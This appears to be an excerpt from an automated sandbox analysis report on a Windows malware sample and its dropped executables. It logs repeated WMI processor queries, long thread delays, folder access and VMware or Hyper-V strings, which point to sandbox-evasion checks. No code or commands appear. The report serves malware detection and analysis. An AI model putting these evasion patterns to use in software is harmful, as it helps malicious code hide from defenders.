Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59871 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59547 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59218 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 58999 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199955 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199828 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199718 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59766 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59641 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59422 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59313 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1198910 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 599886 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 599777 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59867 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59529 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59407 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59287 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598871 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598761 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598652 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59840 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59733 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59625 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59516 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59379 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59261 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 597708 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 597543 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 59859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4I
Source: svchost.exe, 00000007.00000002.4113805548.000001CC7745A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.4112259937.000001CC71E2B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
